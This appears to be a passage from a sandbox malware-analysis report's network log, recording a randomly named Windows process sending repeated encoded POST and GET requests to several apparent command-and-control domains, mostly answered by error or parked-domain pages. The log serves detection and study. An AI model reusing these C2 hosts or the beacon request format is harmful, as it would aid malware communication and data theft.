    Data Ascii: W638b4U=5oZRZJtRgbXMOvUrG1YCd7j8SP+aQsqKTjMNpC2PHHnj4JUEhzApxzRNn80vYy14KY5E/dlH9dlr5UbBAF34Yfd/mW4E0YaPeag30MPxqItVG47ZNbEchqTbGFighglmfol6/LODop2h2C+obAu7hE+fExOGgB5LlciQLvjdfm9c0f0ztn+qUBARrCUMpdqEFJ4w2aw=
Nov 14, 2024 15:42:19.205506086 CET | 423               | IN        | HTTP/1.1 404 Not Found
    Date: Thu, 14 Nov 2024 14:42:14 GMT
    Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
    Content-Length: 203
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
42         | 192.168.2.5 | 50021       | 23.106.59.18   | 80               | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe

Timestamp                           | Bytes transferred | Direction | Data
Nov 14, 2024 15:42:20.927007914 CET | 683               | OUT       | POST /95c0/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 228
    Cache-Control: max-age=0
    Connection: close
    Host: www.vehiculargustav.click
    Origin: http://www.vehiculargustav.click
    Referer: http://www.vehiculargustav.click/95c0/
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
    Data Ascii: W638b4U=5oZRZJtRgbXMPPkrHUYCfbj/Of+aaMriTjINpDylH1Tj9dYEgyAp9TRNvc0mVS1zKY1i/YFH9dZr5RnBciD3ZPdxt24CpIaPeag30IfLqI1VGILZM6EbvKTYHFiglglifolE/J7Los6h2DOoaSK6uE+dAxPkkz0c/MTeRPWKFHlP4JFZ3F2CHhsp7Rc74tLtfqoAoNn5lbBwG0thzfNDscXrTEf3
Nov 14, 2024 15:42:21.730305910 CET | 423               | IN        | HTTP/1.1 404 Not Found
    Date: Thu, 14 Nov 2024 14:42:17 GMT
    Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
    Content-Length: 203
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
43         | 192.168.2.5 | 50022       | 23.106.59.18   | 80               | 4068 | C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe

Timestamp                           | Bytes transferred | Direction | Data
Nov 14, 2024 15:42:23.472651958 CET | 1700              | OUT       | POST /95c0/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 1244
    Cache-Control: max-age=0
    Connection: close
    Host: www.vehiculargustav.click
    Origin: http://www.vehiculargustav.click
    Referer: http://www.vehiculargustav.click/95c0/
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: W638b4U= [TRUNCATED]
Nov 14, 2024 15:42:24.278050900 CET  423  IN  HTTP/1.1 404 Not Found
Date: Thu, 14 Nov 2024 14:42:19 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
Content-Length: 203
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
44          192.168.2.5  50023        23.106.59.18    80                4068  C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 14, 2024 15:42:26.017354012 CET  390                OUT        GET /95c0/?W638b4U=0qxxa8sZzaTQGsV+IlYRUJribMqFDMjNP0hPtjDvBTL1oNFysxcHk25mntsLFh1aL6dJocQb44ZX+yLzRXP4Uod4s1803YDXY8kloLbvjpkOPOrnE5sGxLOIJT+RqysedQ==&Xll=50hLc0Hhy HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.vehiculargustav.click
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Nov 14, 2024 15:42:26.817015886 CET  423  IN  HTTP/1.1 404 Not Found
Date: Thu, 14 Nov 2024 14:42:22 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
Content-Length: 203
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
45          192.168.2.5  50024        208.91.197.27   80                4068  C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 14, 2024 15:42:40.278240919 CET  645                OUT        POST /fjsq/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 208
Cache-Control: max-age=0
Connection: close
Host: www.yushaliu.online
Origin: http://www.yushaliu.online
Referer: http://www.yushaliu.online/fjsq/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: W638b4U=LrxLbm2PdKLiwF+yrPXIX+wcnzx1XkbA5KTvhJFX9DIf6AVJ6rsnHX9DnJxlUgQFUKqArpfNlNtnzEcmrC+ZSGaIUqfaCDc4LLcXvUy9OB00BNu5m4gxAzUCaXEi/JFtyHIPjALEzEGqcQyBk43TkS9IH+i0lLfnnc6ghndR9zL0rBKz3smQjROaX4+MEnFfRM9PAcY=


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
46          192.168.2.5  50025        208.91.197.27   80                4068  C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 14, 2024 15:42:42.821852922 CET  665                OUT        POST /fjsq/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 228
Cache-Control: max-age=0
Connection: close
Host: www.yushaliu.online
Origin: http://www.yushaliu.online
Referer: http://www.yushaliu.online/fjsq/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: W638b4U=LrxLbm2PdKLiiwuyoorIf+wdoTx1C0aJ5KfvhM8K9Qgf6glJo/AnEX9DspxkaAQeUKmyrs/NlJNnzEsmrSCeSWaKB6fYGDc4LLcXvU3qOCE0B9+5lZg2DzUDdXEiuZFpyHJcjBXizG+qcRiBktbQuS9OZOjrlZiAlfORtm1RmF/Bq37ZtOu4wxiiHr27VXk2Lvt/eLPaBieYJENl445M8Qk881vr


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
47          192.168.2.5  50026        208.91.197.27   80                4068  C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 14, 2024 15:42:45.360934019 CET  1682               OUT        POST /fjsq/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 1244
Cache-Control: max-age=0
Connection: close
Host: www.yushaliu.online
Origin: http://www.yushaliu.online
Referer: http://www.yushaliu.online/fjsq/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: W638b4U= [TRUNCATED]


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
48          192.168.2.5  50027        208.91.197.27   80                4068  C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe

Timestamp                            Bytes transferred  Direction  Data
Nov 14, 2024 15:42:47.909849882 CET  384                OUT        GET /fjsq/?W638b4U=GpZrYQXTa/T8sVztsMzbTqF8lxxIC07IkIuZnLhPq18W1QYyx74IZS8PtaR6C0AcFpyS8tKbrMRis2tA9BeSbA/Vc9/aSgY+IqBazWG3FiJEJ5+81Lg8Vy8GcHYtnLYhkw==&Xll=50hLc0Hhy HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.yushaliu.online
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Nov 14, 2024 15:42:49.098988056 CET  1236  IN  HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:42:48 GMT
Server: Apache
Referrer-Policy: no-referrer-when-downgrade
Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_FKMBTmJuyXbFqvLAoLvQfEpbtPKyfLbeNG2jRQY+1WT0/+dut6/b0uGlh75jiNayqO9DqRrX5z0SNG/jgUy2lw==
Content-Length: 2615
Content-Type: text/html; charset=UTF-8
Connection: close
Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_FKMBTmJuyXbFqvLAoLvQfEpbtPKyfLbeNG2jRQY+1WT0/+dut6/b0uGlh75jiNayqO9DqRrX5z0SNG/jgUy2lw=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.yushaliu.online/px.js?ch=1">
Nov 14, 2024 15:42:49.099042892 CET  1236  IN  (continuation of response body)
Data Ascii: </script><script type="text/javascript" src="http://www.yushaliu.online/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";img
Nov 14, 2024 15:42:49.099055052 CET  987  IN  (continuation of response body)
Data Ascii: ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"></head><body><div id="partner"></div><script type="t


Session ID  Source IP    Source Port  Destination IP  Destination Port
49          192.168.2.5  50028        3.33.130.190    80

Timestamp                            Bytes transferred  Direction  Data
Nov 14, 2024 15:42:54.225327969 CET  660                OUT        POST /ucmb/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 208
Cache-Control: max-age=0
Connection: close
Host: www.marketprediction.app
Origin: http://www.marketprediction.app
Referer: http://www.marketprediction.app/ucmb/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: W638b4U=in6yu/YF+9DT/tP4w6vkrWGTWEQP9Pz3LBuzFAjKsfduzJnPOO1rbuX2491reaGwmCxjrLtiaPeawHPEMPvy1Ti+Zv6Tv5mrl4NEpShtFXb8m0mP7tW1KFZ69cbD3mRJgf9EwYaRs4NXzQ42H6k9ZmMg3O5A+9+8ScHtZGTI8QzItNNVpXG48KaZe1KeIPlWHiw51ic=


Session ID  Source IP    Source Port  Destination IP  Destination Port
50          192.168.2.5  50029        3.33.130.190    80

Timestamp                            Bytes transferred  Direction  Data
Nov 14, 2024 15:42:56.786191940 CET  680                OUT        POST /ucmb/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 228
Cache-Control: max-age=0
Connection: close
Host: www.marketprediction.app
Origin: http://www.marketprediction.app
Referer: http://www.marketprediction.app/ucmb/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: W638b4U=in6yu/YF+9DT5N/4jNTks2GQTEQPzvzsLBqzFBnass1u2cDPPP1reuX2zd1iU6GumC9BrKRiaO6awG/EM+vxzDiGRP6RxJmrl4NEpSk6FXD8mEWP6MW0M1Z9rMbDm2RNgf9ywd7Ms6FXzSw2Hrk+QmMm4u4cxO73etLcU1yJhzf2hb8/z1OQvq2hOmCpZ/E/dBgJr1Ieyt6Ymn9+FxvF9hqp0qA6


Session ID | Source IP | Source Port | Destination IP | Destination Port
51 | 192.168.2.5 | 50030 | 3.33.130.190 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:42:59.335459948 CET | 1697 | OUT | POST /ucmb/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 1244
Cache-Control: max-age=0
Connection: close
Host: www.marketprediction.app
Origin: http://www.marketprediction.app
Referer: http://www.marketprediction.app/ucmb/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: W638b4U= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port
52 | 192.168.2.5 | 50031 | 3.33.130.190 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:43:01.889480114 CET | 389 | OUT | GET /ucmb/?W638b4U=vlSStPgYi/rw0++s6ZKUsH+lT2dpjOyqKmbfTh2Wh6BCmYHhC9h1DMbb37dpPZ/1mBJsvII6DMGZ/nD5LfnLwkKxStK4w4vex/YLsSNnFHqgqyWr0vfKWW8f0ZD4+1Q9hQ==&Xll=50hLc0Hhy HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.marketprediction.app
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Nov 14, 2024 15:43:02.529592037 CET | 409 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Thu, 14 Nov 2024 14:43:02 GMT
Content-Type: text/html
Content-Length: 269
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?W638b4U=vlSStPgYi/rw0++s6ZKUsH+lT2dpjOyqKmbfTh2Wh6BCmYHhC9h1DMbb37dpPZ/1mBJsvII6DMGZ/nD5LfnLwkKxStK4w4vex/YLsSNnFHqgqyWr0vfKWW8f0ZD4+1Q9hQ==&Xll=50hLc0Hhy"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
53 | 192.168.2.5 | 50032 | 3.33.130.190 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:43:19.129043102 CET | 390 | OUT | GET /yjfe/?W638b4U=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRatGgzGgePg7VlA49G10KSSL4yAbTFmYSs1RlWHEt8ktcvA==&Xll=50hLc0Hhy HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.corpseflowerwatch.org
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Nov 14, 2024 15:43:19.819178104 CET | 409 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Thu, 14 Nov 2024 14:43:19 GMT
Content-Type: text/html
Content-Length: 269
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?W638b4U=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRatGgzGgePg7VlA49G10KSSL4yAbTFmYSs1RlWHEt8ktcvA==&Xll=50hLc0Hhy"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
54 | 192.168.2.5 | 50033 | 217.70.184.50 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:43:24.846137047 CET | 639 | OUT | POST /gnvu/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 208
Cache-Control: max-age=0
Connection: close
Host: www.4nk.education
Origin: http://www.4nk.education
Referer: http://www.4nk.education/gnvu/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: W638b4U=qzqDh9nIttQ2bu7SBM0JT72bVxG6971F+/KmbY/hd0HK7sSkv4S4aCLH0ZhtzjFtCzOlrWhqBsvAS1FOwAQosW7a7IG5kyJS9HUtodw9VjPQh/sBQTa+7P+Gq/v9EuwhcGdJhkIcMYt6un0y7WXEo4fQhODVTQsuT2qkN4bOp8sLBNrJwjpaMjq5mb9NKqqMTUPgoKQ=
Nov 14, 2024 15:43:25.663518906 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
Server: nginx
Date: Thu, 14 Nov 2024 14:43:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
55 | 192.168.2.5 | 50034 | 217.70.184.50 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:43:27.393357038 CET | 659 | OUT | POST /gnvu/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 228
Cache-Control: max-age=0
Connection: close
Host: www.4nk.education
Origin: http://www.4nk.education
Referer: http://www.4nk.education/gnvu/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Ascii: W638b4U=qzqDh9nIttQ2dOrSEq8JRb2aLhG60b1B+/OmbaTxcB3K8Nik+Kq4bCLHsJho9DFmC0HGrTZqBsLAS3dOw2Yr+27YwoG/qSJS9HUtodlSVjXQiMkBCia52v+Ft/v9V+wlcGd/hgQ2Mep6unEy6D7L9ofK++CmfUg+cUquIeWc2tweE7ajqBhyfDGB2I16baLlJ3fQ2dGdb/tq/x2+qUhH0QYRe63Q
Nov 14, 2024 15:43:28.262522936 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
Server: nginx
Date: Thu, 14 Nov 2024 14:43:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
56 | 192.168.2.5 | 50035 | 217.70.184.50 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:43:29.940295935 CET | 1676 | OUT | POST /gnvu/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 1244
Cache-Control: max-age=0
Connection: close
Host: www.4nk.education
Origin: http://www.4nk.education
Referer: http://www.4nk.education/gnvu/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                                  Data Ascii: W638b4U=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 [TRUNCATED]
Timestamp: Nov 14, 2024 15:43:31.025857925 CET | Bytes transferred: 608 | Direction: IN | Data:
HTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:43:30 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                                  Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID: 57 | Source IP: 192.168.2.5 | Source Port: 50036 | Destination IP: 217.70.184.50 | Destination Port: 80
Timestamp: Nov 14, 2024 15:43:32.492810965 CET | Bytes transferred: 382 | Direction: OUT | Data:
GET /gnvu/?W638b4U=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4Fjjnnxvqu9VAopw5jutgMYieatrM5Tiebl9fmqoGSNeZ5Og==&Xll=50hLc0Hhy HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                  Connection: close
                                                                                                                                                  Host: www.4nk.education
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Timestamp: Nov 14, 2024 15:43:33.305784941 CET | Bytes transferred: 1236 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 14 Nov 2024 14:43:33 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  Content-Security-Policy: default-src 'self'; script-src 'nonce-0daadd92cfa849849c9c0299dfd8e709';
                                                                                                                                                  Vary: Accept-Language
                                                                                                                                                  Data Raw: 39 32 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 6e 6f 6e 63 65 2d 30 64 61 61 64 64 39 32 63 66 61 38 34 39 38 34 39 63 39 63 30 32 39 39 64 66 64 38 65 37 30 39 27 3b 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 [TRUNCATED]
                                                                                                                                                  Data Ascii: 922<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-0daadd92cfa849849c9c0299dfd8e709';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>4nk.education</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article clas
Timestamp: Nov 14, 2024 15:43:33.305825949 CET | Bytes transferred: 1236 | Direction: IN | Data Raw: 73 3d 22 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 63 6f 6e 74 65 6e 74 5f 31 72 41 38 37 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 5f 32 30 32 33 2d 74 69 74 6c 65 5f 31 33 63 65 4b 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20
                                                                                                                                                  Data Ascii: s="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?search=
